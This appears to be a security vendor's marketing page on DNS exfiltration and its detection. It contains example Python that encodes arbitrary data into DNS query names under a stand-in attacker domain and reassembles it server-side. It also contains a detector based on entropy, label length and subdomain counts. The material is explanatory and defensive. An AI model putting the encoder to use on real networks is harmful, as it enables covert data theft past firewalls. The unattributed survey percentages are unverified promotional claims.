DNS Exfiltration

Countering DNS Exfiltration with NetworkFort Security Solutions

Attackers have many pathways to an organisation's data, but one that is common today and often overlooked is DNS, the Domain Name System. DNS-based attacks have been on the rise recently: because DNS traffic is allowed out of almost every network, malware on infected devices, and rogue employees, use it as a channel to get data out.

What is DNS Exfiltration?

DNS acts as the phonebook of the internet, a sort of yellow pages. It translates the domain name of an online service into an IP address. Every host reachable on the internet has an IP address, which other hosts use to locate it; DNS lets people use readable names for websites and services instead of memorising the IP address of every page they open or publish.

DNS data exfiltration is a method of moving data between two hosts that have no direct connection to each other: the data is encoded into ordinary DNS queries and answers and relayed by the intermediate DNS servers. During the exfiltration phase, the client sends resolution requests for names under a domain the attacker controls to port 53 of its resolver, which forwards them towards the attacker's name server. Port 53 is open outbound on nearly every network, because every host needs it to resolve names, so this traffic rarely meets a firewall rule. DNS has always been specified to use both UDP and TCP on port 53, but it uses UDP by default; TCP is used for responses too large for a single UDP datagram and for zone transfers.

The attacker registers a domain and sets up an authoritative name server for it that runs the tunnelling software. The malware on the compromised host then looks up names under that domain, with chunks of the stolen data encoded into the subdomain labels. No local resolver is authoritative for the attacker's domain, so the query is relayed to the attacker's server, which decodes the labels; the server can in turn encode commands in its responses. The resolver has thus, in effect, created a tunnel between the attacker and the target, allowing them to pull out data, remotely control the host, or otherwise carry out the attack. This can be achieved with tools such as dnscat2, dnsteal, etc.
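The mechanism above, as an added example that is not part of the original page and not the code of any of the tools named: the client side chunks data into DNS query names within the RFC 1035 label and name limits and serialises a normal TXT query for each, and the server side reassembles the chunks from whatever names arrive at the attacker's authoritative server. The domain exfil.example.com, the sample payload and the four-digit sequence label are assumptions made for the example.

```python
import base64
import struct

# RFC 1035 limits: one label is at most 63 octets, and a name in presentation
# form is at most 253 characters (255 octets on the wire).
MAX_LABEL = 63
MAX_NAME = 253


def to_b32(data: bytes) -> str:
    # Lowercase, unpadded base32: DNS names are case-insensitive and '=' is not
    # a valid hostname character, so the usual base64 alphabet will not do.
    return base64.b32encode(data).decode().rstrip("=").lower()


def from_b32(text: str) -> bytes:
    pad = (-len(text)) % 8
    return base64.b32decode(text.upper() + "=" * pad)


def build_query_names(data: bytes, domain: str, seq_width: int = 4) -> list[str]:
    """Client side: turn `data` into query names of the form
    <seq>.<b32 label>[.<b32 label>...].<domain>, each within the limits."""
    suffix = "." + domain.strip(".")
    encoded = to_b32(data)
    labels = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]

    def make_name(seq: int, parts: list[str]) -> str:
        return f"{seq:0{seq_width}d}." + ".".join(parts) + suffix

    names: list[str] = []
    current: list[str] = []
    for label in labels:
        # Greedy packing: as many full labels per name as the 253-char limit allows.
        if current and len(make_name(len(names), current + [label])) > MAX_NAME:
            names.append(make_name(len(names), current))
            current = []
        current.append(label)
    if current:
        names.append(make_name(len(names), current))
    for name in names:
        if len(name) > MAX_NAME:
            raise ValueError(f"domain too long to carry a payload label: {name}")
    return names


def build_dns_query(name: str, txid: int, qtype: int = 16) -> bytes:
    """Serialise a standard recursive query for `name` in RFC 1035 wire format,
    which is exactly what leaves the host for port 53. qtype 16 = TXT, a record
    type tunnelling tools favour because its answers can carry the most data."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD=1; QDCOUNT=1
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)       # QCLASS=IN


def reassemble(names: list[str], domain: str) -> bytes:
    """Server side: what the attacker's authoritative name server does with the
    names it receives, in any order and mixed with unrelated lookups."""
    suffix = "." + domain.strip(".")
    chunks: dict[int, str] = {}
    for name in names:
        if not name.endswith(suffix):
            continue                      # a lookup for some other name
        seq, _, payload = name[:-len(suffix)].partition(".")
        chunks[int(seq)] = payload.replace(".", "")
    return from_b32("".join(chunks[k] for k in sorted(chunks)))


# Constructed sample payload: 290 bytes, including non-text bytes.
SAMPLE = bytes(range(256)) + b"constructed-sample-tail-0123456789"
EXFIL_DOMAIN = "exfil.example.com"   # assumed attacker-controlled domain


if __name__ == "__main__":
    names = build_query_names(SAMPLE, EXFIL_DOMAIN)
    for n in names:
        print(len(n), n)
    print("first query on the wire:", build_dns_query(names[0], 0x1234).hex())
    # Arrival order does not matter: reassembly sorts by the sequence label.
    print(reassemble(list(reversed(names)) + ["www.example.com"], EXFIL_DOMAIN) == SAMPLE)
```

With an 18-character suffix, three 63-character labels fit in one name, so each query moves roughly 118 bytes; the 290-byte sample needs three queries, each well under the 512-byte UDP limit. Every name is a syntactically ordinary hostname, which is why no resolver on the path has any reason to refuse it.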

A security survey of businesses in North America and Europe on their DNS reported the following:

  • 46 percent of respondents had experienced DNS exfiltration
  • 45 percent had experienced DNS tunnelling

NetworkFort Solution

NetworkFort uses machine learning and artificial intelligence to detect these attacks. There are two complementary ways in which it can detect a DNS exfiltration attack.

Payload Analysis: Payload analysis inspects the content of the DNS packets themselves, the query names and the answer records, as they flow through the network. Tunnelled data leaves recognisable traces there: unusually long labels, labels made of high-entropy encoded text (hexadecimal or base32-like strings rather than words), and heavy use of record types such as TXT or NULL that carry far more data than an A record. When such an anomaly is found in the payload it is much easier to determine the kind and intent of the attack, and the tunnel can be blocked before data leaves.

Traffic Analysis: Traffic analysis uses information such as the geographic location of the name servers being queried, the volume of requests, the number of distinct subdomains looked up under a single domain, and the known history and age of the domain to separate normal traffic from anomalies. For network detection and response, machine learning is used to establish a baseline of what normal DNS behaviour looks like in a given environment, and then to raise alerts on behaviour that deviates from it, such as one host issuing hundreds of never-repeated queries for a domain nobody on the network had queried before.
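To make both detection approaches concrete, here is an added example (my own code, not NetworkFort's product logic) that runs payload analysis and traffic analysis over a constructed DNS query log. The log format, the thresholds and the client addresses are assumptions; the tunnelling host sends 30 base32-encoded chunks to an assumed attacker domain, while a second host repeats one benign name 30 times to show why raw volume alone is a poor signal.

```python
import base64
import hashlib
import math
from collections import defaultdict

LONG_LABEL = 40          # benign hostnames rarely carry a single label this long
HIGH_ENTROPY = 3.8       # bits per character; encoded payloads sit well above this
UNIQUE_SUBDOMAINS = 20   # distinct subdomains per (client, domain) before alerting
TUNNEL_QTYPES = {"TXT", "NULL", "CNAME", "MX"}  # types whose answers carry the most data


def registered_domain(qname: str) -> str:
    # Naive: the last two labels. A real deployment should use the Public Suffix
    # List so that "host.example.co.uk" is not collapsed to "co.uk".
    return ".".join(qname.rstrip(".").split(".")[-2:])


def entropy(text: str) -> float:
    """Shannon entropy of `text` in bits per character."""
    if not text:
        return 0.0
    counts: dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def payload_indicators(qname: str, qtype: str) -> list[str]:
    """Payload analysis: judge one query by its own content."""
    labels = qname.rstrip(".").split(".")
    payload = "".join(labels[:-2])            # everything below the registered domain
    reasons = []
    longest = max((len(l) for l in labels), default=0)
    if longest > LONG_LABEL:
        reasons.append(f"label of {longest} chars")
    h = entropy(payload)
    if len(payload) >= 16 and h > HIGH_ENTROPY:
        reasons.append(f"entropy {h:.2f} bits/char")
    # A TXT lookup is normal on its own (SPF, DKIM, DMARC); it only adds weight
    # when the name already looks encoded.
    if reasons and qtype in TUNNEL_QTYPES:
        reasons.append(f"qtype {qtype}")
    return reasons


def parse_line(line: str) -> dict:
    # Constructed log format: "<timestamp> client=<ip> qtype=<type> qname=<name>"
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = ts
    return rec


def analyse(lines: list[str]) -> dict:
    """Payload analysis per query plus traffic analysis per (client, domain)."""
    payload_alerts = []
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "chars": 0})
    for line in lines:
        rec = parse_line(line)
        qname, dom = rec["qname"], registered_domain(rec["qname"])
        reasons = payload_indicators(qname, rec["qtype"])
        if reasons:
            payload_alerts.append((rec["client"], qname, reasons))
        sub = qname[:-len(dom) - 1] if len(qname) > len(dom) else ""
        s = stats[(rec["client"], dom)]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["chars"] += len(sub.replace(".", ""))
    traffic_alerts = {}
    for key, s in stats.items():
        # Raw volume is a weak signal (a busy host repeats the same name); many
        # distinct subdomains under one domain is what a tunnel cannot avoid.
        if len(s["subdomains"]) >= UNIQUE_SUBDOMAINS:
            traffic_alerts[key] = {
                "queries": s["queries"],
                "unique_subdomains": len(s["subdomains"]),
                # base32 carries 5 bits per character: rough upper bound on bytes moved
                "est_bytes": s["chars"] * 5 // 8,
            }
    return {"payload": payload_alerts, "traffic": traffic_alerts}


def _b32(data: bytes) -> str:
    return base64.b32encode(data).decode().lower().rstrip("=")


# Constructed sample log: one host tunnelling 30 chunks of 32 bytes each to an
# assumed attacker domain, another host hammering one benign name, plus a few
# ordinary lookups (a legitimately long hostname and a DMARC TXT record).
SAMPLE_LOG = [
    f"2024-05-01T10:00:{i:02d}Z client=10.0.0.5 qtype=TXT "
    f"qname={i:04d}.{_b32(hashlib.sha256(b'constructed chunk %d' % i).digest())}.exfil.example.com"
    for i in range(30)
] + [
    f"2024-05-01T10:01:{i:02d}Z client=10.0.0.7 qtype=A qname=www.example.com"
    for i in range(30)
] + [
    "2024-05-01T10:02:00Z client=10.0.0.5 qtype=A qname=static-assets-01.cdn.example.net",
    "2024-05-01T10:02:01Z client=10.0.0.5 qtype=TXT qname=_dmarc.example.org",
    "2024-05-01T10:02:02Z client=10.0.0.7 qtype=A qname=mail.example.org",
]


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for client, qname, reasons in result["payload"][:3]:
        print(client, qname[:40] + "...", reasons)
    for (client, dom), info in result["traffic"].items():
        print(client, dom, info)
```

Only the tunnelling host trips either detector: each of its queries carries a 52-character label, and across the window it looks up 30 distinct subdomains of one domain, whereas the host repeating www.example.com 30 times never exceeds one unique subdomain. In production the fixed thresholds would be replaced by the learned per-environment baseline the paragraph describes, and the registered-domain split should use the Public Suffix List.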


To protect your organisation from the harmful effects of DNS exfiltration attacks, which are becoming more common, NetworkFort offers a network detection solution that protects your data from attackers. NetworkFort applies AI algorithms and machine learning techniques to provide a high level of visibility and greater insight across the whole security environment.
